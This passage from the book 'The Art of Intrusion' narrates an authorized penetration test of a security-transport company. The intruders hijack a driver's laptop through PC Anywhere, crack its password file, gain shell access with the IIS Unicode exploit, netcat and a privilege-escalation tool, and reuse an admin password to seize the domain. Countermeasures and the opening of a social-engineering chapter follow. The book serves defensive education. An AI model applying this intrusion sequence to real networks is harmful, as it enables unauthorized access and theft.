   (For those not familiar with pinging, it’s a network scanning technique
that involves transmitting certain types of packets — Internet Control
Message Protocol, or ICMP — to the target system to determine
whether the host is “alive” or up. If the host is alive, it will respond with
an “ICMP echo reply” packet.) Louis continues, “This seemed to con-
firm our impression that there was another firewall, there was another
layer of security between the 3COM device and their internal network.”
   Louis was beginning to feel they had reached a dead end.

     We got access to this VPN device, but we couldn’t set up our own
     VPN through it. At that point, the enthusiasm levels went down
     a little bit. We kind of started to get the feeling that we’re not
     actually going to get any further into the network. And so we
     needed to brainstorm for ideas.

   They decided to investigate the IP addresses that they had discovered
in the console log. “We kind of saw that a next step was to have a look
and see what was remotely communicating to this 3COM device, because
if you could break into that device, you might be able to hijack an exist-
ing connection to the network.” Or they might be able to obtain the
necessary authentication credentials to masquerade as a legitimate user.
   They knew some of the filtering rules, Louis said, and were looking for
ways of bypassing these rules on the firewall. His hope was that they’d be
able to “find systems that were trusted and maybe had the leverage to
actually pass through this firewall. The IP addresses that were coming up
were of great interest to us.”
   When they were connected to the 3COM system console, he explained,
anytime a remote user connected or a configuration change was made, it
flashed up an alert message at the bottom of the screen. “We were able
to see the connections going on in these IP addresses.”
   The registration records detailed the organization that particular IP
addresses were registered to. Additionally, these records also include the
contact information for administrative and technical personnel responsi-
ble for the organization’s network. Using these addresses, they again
turned to the registration database records on RIPE, which gave them
information on what company these IP addresses were assigned to.
204                           The Art of Intrusion


  In fact, this search brought another surprise. “We found the addresses
were registered to a big telecommunications provider within this partic-
ular country. At this point we couldn’t completely put it all together, we
couldn’t really understand what these IP addresses were, why people
were connecting from a telecoms company,” Louis said, using the British
term for what we call an ISP. The two guys began to wonder if the VPN
connections were even from remote users of the company, or something
entirely different that they couldn’t at the moment even guess at.

      We were very much where we needed to sit down and have a real
      brain dump. We needed to really put together this picture so we
      can actually start to try and understand.
      The promise of the early morning had not been fulfilled. We had
      access to the system, but yet we didn’t manage to get any further,
      and felt that we had not made any progress during the day. But
      instead of just disappearing home and kind of coming back in the
      next morning and picking up there, we thought we’d go to the
      pub, have a drink and kind of de-stress and clear our heads before
      we got on public transport and made our way home.
      This was early springtime with a little bit of a nip in the air. We
      left the office and went around the corner to a kind of quite dark
      and dingy traditional English pub.
      I was drinking lager, Brock was drinking peach schnapps and
      lemonade — a good drink, you ought’a try it. And we just kind
      of sat there and chatted and commiserated between ourselves with
      how the day hadn’t gone as planned. After the first drink we were
      a little bit more relaxed and a piece of paper and a pen came out.
      We just started throwing out some ideas about what we were
      going to do next.
      We were very kind of keen to get something laid out so when we
      came back in the morning. we could quickly sit down and try
      something. We drew up the network architecture as we mapped it,
      and tried to identify what users would need VPN access, where
      the systems were physically located, and the likely steps the system
      implementers thought out when setting up the remote access serv-
      ice for this company.
      We drew up the known systems and then from that point tried to
      work out some of the detail and where some of the other systems
      were located [see Figure 9-1]. We needed to understand where in
      the network that 3COM device was situated.
                                      Chapter 9           On the Continent                                     205

      Fully Patched              Fully Patched                             Unpatched                   Primary
        External                   External                                 IIS Web                    Domain
       Mail Server                Web Server                                 Server                   Controller




                        DMZ Network                                                     Internal Network

                                                             Firewall
                                 3Com VPN
                                 terminator

Cisco Router                                                                  RADIUS Server           Application
Providing IP                                                                                            Server
  Filtering
                                                             Internet



                                      PPTP VPN Session



           Security Van
                                                  Bank of
                                                  Modems




               Laptop                                                                              Brock       Louis
                                                                    Telecoms Provider

                                Cell phone base station

Figure 9-1: Illustration of what the two hackers thought might be the configuration,
which would explain what they had observed about the network and the operations.


  Louis wondered who besides the internal employees might also need to
have access to this network. This was a company proud of its technolog-
ical innovation, so Louis and Brock thought that maybe they had devel-
oped a “really great distribution application” that would enable guards to
log in after they had made a delivery, and then find out what their next
pickup would be. This application may have been programmed to make
the process idiot-proof through automation. Maybe the driver would
click an icon, which would tell the application to connect to the applica-
tion server and obtain his orders.

       We were thinking that these drivers are not going to be very com-
       puter savvy, they’re going to have a system set up that’s very
       easy to use. We started to think of it from a business point of
       view: What kind of system would be easy to set up, what kind of
       system would be easy to maintain and would be secure?

  They thought about a dial-up service, “perhaps from a laptop computer
in the cabin [the driver’s compartment]. And the company would either
206                          The Art of Intrusion


have to host these servers that we’d gotten into, or they would have to
outsource them with a third party. We hypothesized that the third party
was a telecoms company, and information would have to pass from the
telecoms company to our target company, and that had to pass over the
Internet through a VPN tunnel.” They conjectured that the guards
would call into the ISP and authenticate there, before being allowed to
connect into the target company’s network.
  But there was also another possibility. Louis went on:

      We hypothesized, “Let’s see if we can work out an architecture
      whereby a guy in a van can dial up, pass his authentication cre-
      dentials across and they are actually authenticated by the target
      company rather than the telecoms provider. How could that com-
      pany VPN be set up so that any information being passed from
      the guard to the target company would not go unencrypted across
      the Internet?”

   They also thought about how the company was going about authenti-
cating users. If a guard has to dial up to one of these systems located at
the telecoms company and authenticate to the telecoms company, they
reasoned, then the authentication services were simply being outsourced.
Maybe there was another solution, they figured, whereby the authentica-
tion servers were actually hosted by the target company rather than the
telecoms provider.
   Often the authentication task is passed off to a separate server that pro-
vides this function. Maybe the 3COM device was being used to access an
authentication server on the internal network of the target company.
Calling from a cellular modem, a guard would connect to the ISP, be
passed to the 3COM device, and his username and password would then
be sent off to the other server for authentication.
   So their working hypothesis at this point was that when a security guard
initiated a dial-up connection, he established a VPN between himself and
the 3COM device.
   Louis and Brock figured that to gain access to the internal network, they
first had to gain access to the telecommunications system at the ISP that
the van drivers connected with. But “one thing we didn’t know was the
phone numbers of these dial-up devices. They were located in a foreign
country and we didn’t know what kind of phone lines they were, and we
didn’t have much chance to find that information on our own. The big
thing we knew was that the type of protocol for the VPN was PPTP.”
The reason this was significant is because Microsoft’s default VPN instal-
lation just uses a shared secret, which is usually the Windows login and
password to the server or domain.
                         Chapter 9   On the Continent                         207

 They had had a few drinks by this time, and they decided on a “no-
holds-barred approach” to solving the problem.

     At this stage you’re going to keep this piece of paper you’ve scrib-
     bled all this stuff down on because this could be a really good hack
     if we get in. And there was almost a sense of pride between the two
     of us about how we were going to accomplish this.


Some Thoughts about “Hackers’ Intuition”
The guess the pair made that night would turn out to be quite accurate.
Louis remarked about this insight that good hackers seem to have:

     It’s very hard to explain what causes you to get that feeling. It just
     comes from experience and looking at the way the systems are
     configured.
     Brock, at a very early stage, just got the feeling that we should
     keep going with this thing because he thought we were going to get
     a result from the research; it’s very hard to explain. Hacker’s
     intuition?
     You see little pieces of information, and the way things are
     phrased, and you start to get a little bit of an insight of the com-
     pany and the people that are responsible for the IT systems. And
     there was kind of this feeling that they knew about security but
     that maybe they’re doing something a little bit wrong.

  My own view of the subject is that hackers gain insight into how net-
works and systems are usually configured in the business environment
just by poking around. With experience, you gain an awareness of how
system administrators and implementers think. It’s like a game of chess,
in which you’re trying to outthink or outsmart your opponent.
  So I believe what’s actually at play here is based on experience of how sys-
tem administrators set up networks and the common mistakes they make.
Maybe Louis was right at the beginning of his remarks on the subject:
What some people call intuition is better labeled experience.


The Fourth Day
The next morning when they came in, they sat there and watched the
console log on the 3COM device, waiting for people to connect up. Each
time someone did, as quickly as possible they port scanned the IP address
that was making an incoming connection.
208                           The Art of Intrusion


  They found that these connections came up for maybe a minute or so
and then disconnected. If they were right, a guard would dial in, pick up
his work order, then go right back offline again. Which meant they would
have to move very quickly. “When we saw these IP addresses flash up,
we’d really bash the client system hard,” Louis commented, using “bash”
in the sense of pounding the keys with adrenaline running, as in playing
an exciting computer game.
  They picked out some ports for services that might be vulnerable, hop-
ing to find one that could be attacked, such as a telnet or FTP server, or
an insecure Web server. Or perhaps they could gain access to open shares
over NetBIOS. They also looked for GUI-based remote desktop pro-
grams such as WinVNC and PC Anywhere.
  But as the morning dragged on, they couldn’t see any services running
beyond a couple of hosts.

      We weren’t really getting anywhere, but we sat there and kept
      scanning every time a remote user connected. And then one
      machine connected. We did a port scan and found an open port
      ordinarily used for PC Anywhere.

  The application PC Anywhere allows taking control of a computer
remotely. But this is only possible when the other computer is also run-
ning the program.

      Seeing that port showed up on the port scan, there was kind of this
      renewed sense of enthusiasm — “Ah, there’s PC Anywhere on this
      box. This could be one of the end user machines, let’s really go
      with this.”
      We were shouting about the place, “Who has PC Anywhere
      installed!?”
      Someone shouted back, “I’ve got PC Anywhere.” So I shouted out the
      IP address so he could connect to the system as quickly as possible.

  Louis called the effort to connect to a PC Anywhere system “a very
defining moment.” He joined the other guy at his machine as a window
appeared on the screen. “It’s initially a black background,” Louis said,
“and one of two things happens — either a gray password prompt is
displayed, or the background goes blue and a Windows desktop comes
into view.”

      The desktop option is the one we were holding our breaths for.
      It seemed like an eternity while waiting for the black screen to
                        Chapter 9   On the Continent                        209

     disappear. I kept thinking to myself, “It’s connecting, it’s con-
     necting, it’s going to timeout.” Or “I’m going to get a password
     prompt.”
     Right at the last second, when I thought “Here comes the pass-
     word prompt,” it was the Windows desktop! Wow! We’ve got a
     desktop at this point. Everybody else in the room came over to look.
     My reaction was, “Here we go again, let’s really get a hold of this,
     let’s not lose this chance.”

 So they were now successfully into the client that connected to the
3COM device.

     At this point, we thought it was kill or be killed — we knew that
     these people were connecting up for very short time and we knew
     we might not get another opportunity.

  The first thing to do was to open the PC Anywhere session and hit two
on-screen buttons, that Louis referred to as the “Blank the screen but-
ton” and the “Lock the user out of the console button.” He explained:

     When you use PC Anywhere, by default both the person at the
     desktop of the machine and the person using PC Anywhere can
     have access to the mouse and move it about the screen to run
     applications, or open files, and so forth. But with PC Anywhere
     you can actually lock out the user at the keyboard.

  They did this, gaining control of the session, also making sure the user
couldn’t see what they were doing because they had blanked his screen.
Louis knew that it wouldn’t take the user long to get suspicious or think
he had a computer problem, and shut the machine down, meaning that
the guys didn’t have very long.

     We were now trying to rescue our chance of finally getting in. At
     this point, we had to quickly think on our feet between us to decide
     what we were going to try next, and what valuable information
     we could extract from this machine.
     I could see that the machine was running Microsoft Windows 98
     and so what we had to do was find someone who could tell us what
     information they could get out of a Windows 98 machine.
     Fortunately, one of these guys in the room . . . had been kind of
     taking an interest, this guy was not actually working on our proj-
     ect, but he knows how to get information off systems.
210                          The Art of Intrusion


   The first thing he suggested was looking at the password list (PWL)
file. (This file, used under Windows 95, 98, and ME, contains sensitive
information such as dial-up and network passwords. For example, if you
use dial-up networking under Windows, all the authentication details,
including the dial-up number, username, and password, are likely stored
in a PWL file.)
   Before downloading the file, they had to turn off the antivirus software
so it wouldn’t detect the tools they were using. Then they tried using the
document-transfer capability in PC Anywhere to transfer the PWL file
from the driver’s machine to themselves. It didn’t work. “We weren’t
sure why, but didn’t have time to sit around and discuss it. We had to get
the PWL information off that machine immediately, while the driver was
still on line.”
   What else could they do? One possibility: upload a cracking tool, crack
the PWL file on the driver’s machine and extract the information into a
text file, and then send the text file to themselves. They tried to login into
an FTP server to download the PWL craking tool. But they realized a dif-
ficulty: The keyboard mappings on the driver’s machine were for the for-
eign language, which would explain the problems they were having
trying to authenticate. “We kept getting a ‘Login Incorrect’ message
because of the foreign keyboard mappings.”
   The clock was ticking.

      We thought our time was going to be up. This guy’s sitting in a
      security van, he might be transporting a lot of money, or maybe
      prisoners. He’s wondering to himself, “What the heck is going on
      here?”
      I’m afraid he’s going to pull the plug before we get what we want.

  Here they were, facing a hugely pressured time crunch, and none of the
guys in the room had an answer for the foreign-keyboard problem.
Maybe as a workaround they could enter the username and password in
ASCII code instead of actual letters and numbers. But nobody knew off-
hand how to enter characters using the equivalent ASCII code.
  So, what does anyone do in today’s world when they need an answer
in a hurry? That’s what Louis and Brock did: “We opted to jump on to
the Internet and do some research to find a way of entering letters with-
out using the letters on the keyboard.”
  In short order, they had their answer: Activate the Num Lock key, then
hold down the <Alt> key and type the number of the ASCII character on
the numeric keypad. The rest was easy:
                        Chapter 9   On the Continent                       211

     We often need to translate letters and symbols into ASCII and
     vice versa. It’s simply a case of standing up and looking at one of
     our useful crib sheets that we have up on the walls.

  Instead of pictures of pinup girls, these guys had ASCII charts on the
walls. “ASCII pinups,” Louis described them.
  With a little scribbling down of information, and one guy typing at the
keyboard while the other read him what to type, they successfully entered
the username and password. They were then able to transfer the PWL
cracking tool and run it to extract the information from the PWL file into
a text file, which they then transferred off the driver’s laptop to an FTP
server under their control.
  When Louis examined the file, he found the authentication credentials
he had been looking for, including the dial-up number and logon infor-
mation being used by the driver when connecting to the company’s VPN
service. That, Louis thought, was all the information he needed.
  While cleaning up to be sure they didn’t leave any traces of their visit,
Louis inspected the icons on the desktop and noticed one that seemed to
be for the application being run for the guards to pick up their informa-
tion from the company. And so they knew that these machines were, in
fact, connecting through to the company and querying an application
server to obtain information needed by the drivers in the field.


Accessing the Company’s System
“We were very aware,” Louis remembered, “that this user may now be
reporting strange activity, so we extracted ourselves from the situation.
Because if this incident got reported and the VPN service got shut down,
then our login credentials wouldn’t be worth anything.”
  A couple of seconds later, they noticed that their PC Anywhere con-
nection dropped — the guard had disconnected. Louis and the crew had
extracted the information from the PWL file just in the nick of time.
  Louis and Brock now had a phone number, which they expected to be
for one of the dial-up devices that they had drawn on their diagram in the
pub the night before. But again, it was foreign number. Using a Windows
system of the same kind that the guard had been using, they dialed up to
the company’s network, entered the username and password and “We
found that we’ve successfully established a VPN session.”
  The way the VPN was configured, they were given a virtual IP address
within the company’s DMZ, so they were behind the first firewall but still
facing the firewall guarding the internal network that they previously
discovered.
212                         The Art of Intrusion


   This IP address assigned by the VPN was on DMZ range and was likely
trusted by some machines on the internal network. Louis expected that
penetrating the internal network would be much, much easier, since they
had gotten past the first firewall. “At this point,” he says, “we expected
it would easy to get through the firewall, into the internal networks.” But
when he tried, he found that he couldn’t get in directly to an exploitable
service on the machine running the application server. “There was a very
strange TCP port that was allowed through the filtering, that we guessed
was for the application that the guards were using. But we didn’t know
how it worked.”
   Louis wanted to find a system on the company’s internal network that
they could access from the IP address that had been assigned. He
adopted the “usual hacker rules” to try to find a system they could
exploit on the internal network.
   They were hoping to find any one system inside the network that was
never remotely accessible, knowing it would probably not be patched
against these vulnerabilities, since it was “more likely to be treated as an
internal-use-only system.” They used a port scanner to scan for any acces-
sible Web server (port 80) across the entire IP address range of the inter-
nal network, and found a Windows server they could communicate with
that was running Internet Information Server (IIS), but an older version
of the popular server software — IIS4. That was great news, since they
were likely to find some unpatched vulnerability or configuration error
that would give them the keys to the kingdom.
   The first thing they did was to run a Unicode vulnerability detection
tool against the IIS4 server to see if it was vulnerable, and it was.
(Unicode is a 16-bit character set for encoding characters from many dif-
ferent languages using a single character set.) “So we were able to use the
Unicode exploit to execute commands on that IIS Web server,” exploit-
ing security vulnerabilities on a system past the second filtering firewall
on their internal network, “deep inside trusted territory, as it were,” in
Louis’s description. The hackers in this case crafted a Web request
(HTTP) that used these specially encoded characters to bypass the secu-
rity checks of the Web server, allowing them to execute arbitrary com-
mands with the same privileges as the account the Web server was
running under.
   Stuck because they did not have the ability to upload files, they now saw
an opportunity. They used the Unicode vulnerability to run the “echo”
shell command to upload an Active Server Pages (ASP) script — a simple
file uploader that made it easy to transfer more hacking tools to a direc-
tory under the webroot that was authorized to run server-side scripts.
                        Chapter 9   On the Continent                    213

(The webroot is the root directory of the Web server, as distinguished
from the root directory of a particular hard drive, such as C:\.) The echo
command simply writes any arguments passed to it; the output can be
redirected to a file instead of the user’s screen. For example, typing “echo
owned > mitnick.txt” will write the word “owned” in the file mitnick.txt.
They used a series of echo commands to write out the source code of an
ASP script to an executable directory on the Web server.
  They then uploaded other hacking tools, including the popular net-
working tool netcat, which is a very useful utility for setting up a com-
mand shell to listen on an incoming port. They also uploaded an exploit
tool called HK that exploited a vulnerability in older version of Windows
NT to obtain system administrator privileges.
  They uploaded another simple script to run the HK exploit and then
used netcat to open a shell connection back to themselves, enabling them
to enter commands to the target machine, much like getting a “DOS
prompt” in the days of the DOS operating system. “We tried to initiate
an outgoing connection from the internal web server to our computer on
the DMZ,” Louis explained. “But that didn’t work, so we had to use a
technique called ‘port barging.’” After executing the HK program to
gain privileges, they configured netcat to listen on port 80; to “barge”
the IIS server out of the way temporarily, watching for the first incoming
connection to port 80.
  Louis explained barging by saying, “You essentially temporarily push
IIS out of the way, to steal a shell, and allow IIS to sneak back in at the
same time you maintain access to your shell.” In the Windows environ-
ment, unlike Unix-type operating systems, it’s permissible to have two
programs use the same port simultaneously. An attacker can take advan-
tage of this feature by finding a port that’s not filtered by the firewall and
then “barging” onto the port.
  That’s what Louis and Brock did. The shell access they already had on
the IIS host was limited to the rights permitted to the account that the
Web server was running under. So they ran HK and netcat, and were able
to gain full system privileges — running as the system user, which is the
highest privilege on the operating system. Using standard methodolo-
gies, this access would allow them to get full control of the target’s
Windows environment.
  The server was running Windows NT 4.0. The attackers wanted to get
a copy of the Security Accounts Manager (SAM) file, which contained
the details of user accounts, groups, policies, and access controls. Under
this older version of the operating system, they ran the “rdisk /s” com-
mand to make an emergency repair disk. This program initially creates
214                           The Art of Intrusion


several files in a directory named “repair.” Among the files was an
updated version of the SAM file that contained the password hashes for
all the accounts on the server. Earlier Louis and Brock recovered the
PWL file containing sensitive passwords from a security guard’s laptop;
now they were extracting the encrypted passwords of users on one of the
servers of the company itself. They simply copied this SAM file into the
webroot of the Web server. “Then, using a web browser, we retrieved it
from the server to our machine back in our office.”
  When they had cracked the passwords from the SAM file, what they
noticed was that there was another administrator account on the local
machine that was different than the built-in administrator account.

      After I believe it was a couple of hours of cracking, we were able
      to crack the password for this account and then attempt
      to authenticate it to the primary domain controller. And we
      discovered that the local account that had administrator rights
      on the web server we hacked also had the same password on the
      domain! The account also had domain administrator rights.
      So there was a local administrator account on the web server that
      had the same name as a domain administrator account for the
      entire domain, and the password for both of those accounts was
      also the same. It was obviously an administrator being lazy and
      setting up a second account with the same name as the adminis-
      trator account on the local system, and giving it the same
      password.

   Step-by-step. The local account was simply an administrator on the Web
server and didn’t have privileges to the entire domain. But by recovering
the password on that local Web server account, thanks to a careless, lazy
administrator, they were now able to compromise the domain adminis-
trator account. The responsibility of a domain administrator is to admin-
ister or manage an entire domain, as distinguished from being an
administrator on your local desktop or laptop (single machine). In
Louis’s view, this administrator wasn’t an exception.

      This is a common practice we see all the time. A domain admin-
      istrator will create local accounts on their machine on the net-
      work, and use the same password for their accounts with domain
      administrator privileges. And that means the security at each one
      of those local systems can be used to compromise the security of the
      entire domain.
                        Chapter 9   On the Continent                      215


Goal Achieved
Getting closer. Louis and Brock saw that they could now gain full control
over the application server and the data contained on it. They obtained
the IP address used to connect to the application server from the security
guard’s laptop. From this, they realized the application server was on the
same network, which is likely part of the same domain. At last, they had
full control over the entire company’s operations.

     Now we had reached right to the heart of the business. We could
     change orders on that application server, so we could get the
     guards to deliver money to where we said. We could essentially
     issue orders to the guards like, “Pick up money from this business
     and drop off at this address,” and you’re waiting there to get it
     when they arrive.

   Or “Pick up this prisoner A, take him to this location, deliver him to
the custody of this person,” and you’ve just gotten your cousin’s best
friend out of jail.
   Or a terrorist.
   They had in their hands a tool for getting rich, or creating havoc. “It
was kind of shocking because they didn’t see the possibility of what could
have happened had we not brought this to their attention,” Louis says.
   What that company considers “security,” he believes, “is actually suspect
security.”


INSIGHT
Louis and Brock did not enrich themselves from the power they held in
their hands, and they didn’t issue orders to have any prisoners released or
transferred. Instead, they provided the company a full report of what they
had discovered.
  From the sound of it, the company had been seriously remiss. They
hadn’t gone through a risk analysis step-by-step — “If the first machine
gets compromised, what could a hacker do from that point?” and so on.
They considered themselves secure because with a few configuration
changes, they could close the gap Louis had pointed out. Their assump-
tion was that there weren’t other faults except this one that Louis and
Brock had managed to find and use.
  Louis sees this as a common arrogance within the business sector — an
outsider can’t come along and preach security to them. Company IT
216                          The Art of Intrusion


people don’t mind being told about a few things that need to be fixed,
but they won’t accept anyone telling them what they need to do. They
think they know it already. When a breach occurs, they figure they just
dropped the ball on this one occasion.


COUNTERMEASURES
As in so many of the stories in this book, the attackers here did not find
many security flaws in their target company, yet the few they found were
enough to allow them to own the company’s entire domain of computer
systems that were essential to business operations. Following are some
lessons worth noting.


Temporary Workarounds
At some time in the past, the 3COM device had been plugged directly
into the serial port of the Cisco router. While the pressure of answering
immediate needs may justify temporary technology shortcuts, no com-
pany can afford to let “temporary” become “forever.” A schedule should
be set up for checking the configuration of the gateway devices through
physical and logical inspection, or by using a security tool that continu-
ally monitors whether any open ports existing on a host or device is in
accordance with company security policy.


Using High Ports
The security company had configured a Cisco router to allow remote
connections over a high port, presumably in the belief that a high port
would be obscure enough never to be stumbled upon by an attacker —
another version of the “security through obscurity” approach.
  We’ve already addressed the issue more than once in these pages about
the folly of any security decision based on this attitude. The stories in this
book demonstrate again and again that if you leave a single gap, some
attacker will sooner or later find it. The best security practice is to ensure
that the access points of all systems and devices, obscure or not, be fil-
tered from any untrusted network.


Passwords
Once again, all default passwords for any device should be changed
prior to the system or device going into production. Even the technical
                        Chapter 9   On the Continent                  217

white-belts know this common oversight and how to exploit it. (Several
sites on the Web, such as www.phenoelit.de/dpl/dpl.html, provide a list
of default usernames and passwords.)


Securing Personnel Laptops
The systems being used by the company’s remote workers were connect-
ing to the corporate network with little or no security, a situation that is
all too common. One client even had PC Anywhere configured to allow
remote connections without even requiring a password. Even though the
computer was connecting to the Internet via dial-up, and only for very
limited periods of time, each connection created a window of exposure.
The attackers were able to remotely control the machine by connecting
to the laptop running PC Anywhere. And because it had been set up
without requiring a password, attackers were able to hijack the user’s
desktop just by knowing the IP address.
  IT policy drafters should consider a requirement that client systems
maintain a certain level of security before being allowed to connect to
the corporate network. Products are available that install agents onto the
client systems to ensure security controls are commensurate with com-
pany policy; otherwise, the client system is denied access to corporate
computing resources. The bad guys are going to analyze their targets by
examining the whole picture. This means trying to identify whether any
users connect remotely, and if so, the origin of those connections. The
attacker knows if he or she can compromise a trusted computer that is
used to connect to the corporate network, it’s highly likely that this trust
relationship can be abused to gain access to corporate information
resources.
  Even when security is being well handled within a company, there is too
often a tendency to overlook the laptops and home computers used by
employees for accessing the corporate network, leaving an opening that
attackers can take advantage of, as what happened in this story. Laptops
and home computers that connect to the internal network must be
secure; otherwise, the employee’s computer system may be the weak link
that’s exploited.


Authentication
The attackers in this case were able to extract the authentication informa-
tion from the client’s system without being detected. As has been pointed
out repeatedly in earlier chapters, a stronger form of authentication will
218                        The Art of Intrusion


stop most attackers dead in their tracks, and companies should consider
using dynamic passwords, smart cards, tokens, or digital certificates as a
means of authentication for remote access into VPNs or other sensitive
systems.


Filtering Unnecessary Services
IT staff should consider creating a set of filtering rules to control both
incoming and outgoing connections to specific hosts and services from
untrusted networks such as the Internet, as well as from semi-trusted
(DMZ) networks within the company.


Hardening
The story also provides a reminder of an IT staff that did not bother to
harden the computer systems connected to the internal network, or keep
up-to-date with security patches, presumably because of the perception
that the risk of being compromised was low. This common practice gives
the bad guys an advantage. Once the attacker finds a way to access a sin-
gle internal unsecured system and is able to successfully compromise it,
the door is open for expanding illicit access to other systems that are
trusted by the compromised computer. Again, simply relying on the
perimeter firewall to keep the hackers at bay without bothering to harden
the systems connected to the corporate network is like piling all your
wealth in $100 bills on the dining room table and figuring you’re safe
because you keep the front door locked.


THE BOTTOM LINE
Since this is the last chapter on stories that illustrate technical-based
attacks, it seems like a good place for a few words of recap.
  If you were asked to name important steps to defend against the most
common vulnerabilities that allow attackers to gain entry, based on the
stories in this book, what would some of your choices be?
  Please think about your answer briefly before reading on; then go to
the next page.
                      Chapter 9   On the Continent                 219

  Whatever items you came up with as some of the most common vul-
nerabilities described in this book, I hope you remembered to include at
least some of these:

      ●   Develop a process for patch management to ensure that all the
          necessary security fixes are applied in a timely manner.
      ●   For remote access to sensitive information or computing
          resources, use stronger authentication methods than are pro-
          vided by static passwords.
      ●   Change all default passwords.
      ●   Use a defense-in-depth model so that a single point of failure
          does not jeopardize security, and routinely test this model on
          a regular basis.
      ●   Establish a corporate security policy concerning the filtering
          of both incoming and outgoing traffic.
      ●   Harden all client-based systems that access sensitive informa-
          tion or computing resources. Let’s not forget that the persist-
          ent attacker also targets client systems to either hijack a
          legitimate connection or to exploit a trusted relationship
          between the client system and the corporate network.
      ●   Use intrusion-detection devices to identify suspicious traffic
          or attempts to exploit known vulnerabilities. Such systems
          may, as well, identify a malicious insider or an attacker who
          has already compromised the secure perimeter.
      ●   Enable auditing features of the operating system and critical
          applications. Also, ensure that the logs are preserved on a
          secure host that has no other services and the minimal num-
          ber of user accounts.
          Chapter 10
   Social Engineers — How They
   Work and How to Stop Them
The social engineer employs the same persuasive techniques the rest of us
use every day. We take on roles. We try to build credibility. We call in recip-
rocal obligations. But the social engineer applies these techniques in a
manipulative, deceptive, highly unethical manner, often to devastating
effect.
                                     — Social Psychologist Dr. Brad Sagarin




T
           his chapter does something a bit different: We look at the most
           difficult type of attack to detect and defend against. The social
           engineer, or the attacker skilled in the art of deception as one
of the weapons in his or her toolkit, preys on the best qualities of human
nature: our natural tendencies to be helpful, polite, supportive, a team
player, and the desire to get the job done.
  As with most things in life that threaten us, the first step toward a sen-
sible defense is understanding the methodologies used by cyber-adver-
saries. So, we present here a set of psychological insights that probe the
underpinnings of human behavior allowing the social engineer to be so
influencing.
  First, though, an eye-opening story of a social engineer at work. The fol-
lowing is based on a story we received in writing that is both amusing and
a textbook case of social engineering. We thought it so good that we have
included it despite some reservations; the man either had accidentally




                                       221
222                           The Art of Intrusion


omitted some of the details because he was distracted on other business
matters or else he made up portions of the story. Still, even if some of this
is fiction, it makes the case very convincingly of the need for better pro-
tection against social engineering attacks.
   As elsewhere throughout the book, details have been changed to pro-
tect both the attacker and the client company.


A SOCIAL ENGINEER                  AT    WORK
In the summer of 2002, a security consultant whose handle is “Whurley”
was hired by a resort group in Las Vegas to perform a variety of security
audits. They were in the process of reengineering their approach to secu-
rity and hired him to “try to circumvent any and all processes” in an
effort to help them build a better security infrastructure. He had plenty
of technical experience, but little experience being in a casino.
   After a week or so of immersing himself in research on the culture of
the Strip, it was time for the real Las Vegas. He usually made it a practice
to start a job like this early, getting finished before it was officially sched-
uled to begin, because over the years he had found that managers don’t
tell employees about a potential audit until the week they think it’s going
to happen. “Even though they shouldn’t give anyone a heads up, they
do.” But he easily circumvented this by performing the audit in the two
weeks before the scheduled date.
   Though it was nine at night by the time he arrived and settled into his
hotel room, Whurley went straight to the first casino on his list to start his
on-site research. Having not spent a lot of time in casinos, this experience
was quite an eye-opener for him. The first thing he noticed contradicted
what he had seen on the Travel channel, where every casino staffer shown
or interviewed appeared to be an elite security specialist. The majority of
the employees he watched on-site seemed to be “either dead asleep on
their feet or completely complacent in their job.” Both of these conditions
would make them easy targets for the simplest of confidence games —
which wasn’t even going to come close to what he had planned.
   He approached one very relaxed employee and with a very little prod-
ding found the person willing to discuss the details of his job. Ironically,
he had previously been employed by Whurley’s client-casino. “So, I bet
that was a lot better, huh?” Whurley asked.
   The employee replied, “Not really. Here I get floor-audited all the
time. Over there they hardly noticed if I was a little behind, pretty much
  Chapter 10   Social Engineers — How They Work and How to Stop Them   223

that way for everything . . . time clocks, badges, schedules, whatever.
Their right hand doesn’t know what their left is doing.”
   The man also explained that he used to lose his employee badge all the
time, and sometimes he would just share a badge with another employee
to get in for the free meals provided to employees in the staff cafeterias
located within the bowels of the casino.
   The next morning Whurley formulated his goal, which was
straightforward — he would get into every protected area of the casino
that he could, document his presence, and try to penetrate as many of the
security systems as he could. In addition, he wanted to find out if he
could gain access to any of the systems that ran the financials or held
other sensitive information, such as visitor information.
   That night, on the way back to his hotel after visiting the target casino,
he heard a promotion on the radio for a fitness club offering a special for
service industry employees. He got some sleep and the next morning
headed for the fitness club.
   At the club, he targeted a lady named Lenore. “In 15 minutes we had
established a ‘spiritual connection.’” This turned out to be great because
Lenore was a financial auditor and he wanted to know everything that
had to do with the words “financial” and “audit” at the target casino. If
he could penetrate the financial systems in his audit, it was sure to be
viewed as a huge security flaw by the client.
   One of Whurley’s favorite tricks to use when he’s social engineering is
the art of cold reading. As they were talking, he would observe her non-
verbal signals and then throw out something that would lead her to say,
“Oh, no shit — me, too.” They hit if off, and he asked her out to dinner.
   Over dinner, Whurley told her that he was new to Vegas and looking
for a job, that he had gone to major university and had a degree in
Finance, but that he had moved to Vegas after breaking up with his girl-
friend. The change of pace would help him get over the breakup. Then
he confessed to being a little intimidated by trying to get an auditing job
in Vegas because he didn’t want to end up “swimming with the sharks.”
She spent the next couple of hours reassuring him that he would not have
a hard time getting a finance job. To help out, Lenore provided him with
more details about her job and her employer than he even needed. “She
was the greatest thing that had happened to me so far on this gig, and I
gladly paid for dinner — which I was going to expense anyway.”
   Looking back, he said that at this point he was overconfident about his
abilities, “which cost me later.” It was time to get started. He had packed a
224                          The Art of Intrusion


bag with “a few goodies including my laptop, an Orinoco broadband wire-
less gateway, an antenna, and a few other accessories.” The goal was simple.
Try to get into the office area of the casino, take some digital
photos (with time stamps) of himself in places he shouldn’t be, and then
install a wireless access point on the network so that he could try to remotely
hack into their systems to collect sensitive information. To complete
the job, the next day he would have to go back in to get the wireless
access point.
  “I was feeling quite like James Bond.” Whurley arrived at the casino,
outside the employee’s entrance, right at the shift change, positioning
himself to be able to observe the entrance. He thought he would be there
in time to observe things for a few minutes, but most of the people
seemed to have arrived already and he was stuck trying to walk in all by
himself.
  A few minutes of waiting and the entryway was clear . . . which was not
what he wanted. Whurley did, however, notice a guard who looked as if
he were leaving but was stopped by a second guard and they stood
around smoking just outside the exit. When they finished their cigarettes,
they parted and started walking in opposite directions.

      I headed across the street towards the guard who was leaving the
      building and prepared to use my favorite disarming question. As
      he approached me crossing the street, I let him get just past me.

  Then he said, “Excuse me, excuse me, do you have the time?”
  It was by plan. “One thing I’ve noticed is that if you approach some-
one from the front, they’re almost always more defensive than if you let
them get slightly past you before you address them.” While the guard
was telling Whurley the time, Whurley was looking him over in detail. A
name badge identified the guard as Charlie. “As we were standing there,
I had a stroke of luck. Another employee came walking out and called
